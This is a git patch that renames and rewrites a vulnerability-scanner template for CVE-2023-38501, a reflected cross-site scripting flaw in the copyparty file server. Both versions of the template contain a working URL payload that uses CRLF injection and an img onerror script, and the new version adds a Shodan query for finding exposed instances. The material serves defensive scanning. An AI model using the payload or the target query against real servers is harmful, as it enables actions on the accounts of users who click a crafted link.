From b479f9abb6b373218dbde61246be94fddbfacedc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 5 Oct 2023 20:38:15 +0530
Subject: [PATCH] Update and rename CVE-2023-38501.YAML to CVE-2023-38501.yaml
---
http/cves/2023/CVE-2023-38501.YAML | 51 ------------------------------
http/cves/2023/CVE-2023-38501.yaml | 48 ++++++++++++++++++++++++++++
2 files changed, 48 insertions(+), 51 deletions(-)
delete mode 100644 http/cves/2023/CVE-2023-38501.YAML
create mode 100644 http/cves/2023/CVE-2023-38501.yaml
diff --git a/http/cves/2023/CVE-2023-38501.YAML b/http/cves/2023/CVE-2023-38501.YAML
deleted file mode 100644
index a776165a07e..00000000000
--- a/http/cves/2023/CVE-2023-38501.YAML
+++ /dev/null
@@ -1,51 +0,0 @@
-id: CVE-2023-38501
-info:
- name: copyparty v1.8.6 - Cross-Site Scripting
- author: ctflearner
- severity: medium
- description: >
- copyparty is file server software. Prior to version 1.8.7, the
- application contains a reflected cross-site scripting via URL-parameter
- `?k304=...` and `?setck=...`. The worst-case outcome of this is being able
- to move or delete existing files on the server, or upload new files, using
- the account of the person who clicks the malicious link. It is recommended
- to change the passwords of one's copyparty accounts, unless one have
- inspected one's logs and found no trace of attacks. Version 1.8.7 contains a
- patch for the issue.
- remediation: |
- Upgrade to the latest version to mitigate this vulnerability.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2023-38501
- - https://www.exploit-db.com/exploits/51635
- - https://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html
- - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
- - https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2023-38501
- cwe-id: CWE-79
- cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
- metadata:
- verified: true
- max-request: 1
- tags: copyparty,cve,cve2023,Reflected-xss
-http:
- - method: GET
- path:
- - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(\
- 1)%3E"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- -
- condition: and
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml
new file mode 100644
index 00000000000..8485b0cda04
--- /dev/null
+++ b/http/cves/2023/CVE-2023-38501.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-38501
+
+info:
+ name: Copyparty v1.8.6 - Cross-Site Scripting
+ author: ctflearner
+ severity: medium
+ description: |
+ Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
+ remediation: Upgrade to the latest version to mitigate this vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/51635
+ - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38
+ - https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-38501
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2023-38501
+ cwe-id: CWE-79
+ cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: title:"copyparty"
+ tags: copyparty,cve,cve2023,xss
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - 'go to /'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'text/html'
+
+ - type: status
+ status:
+ - 200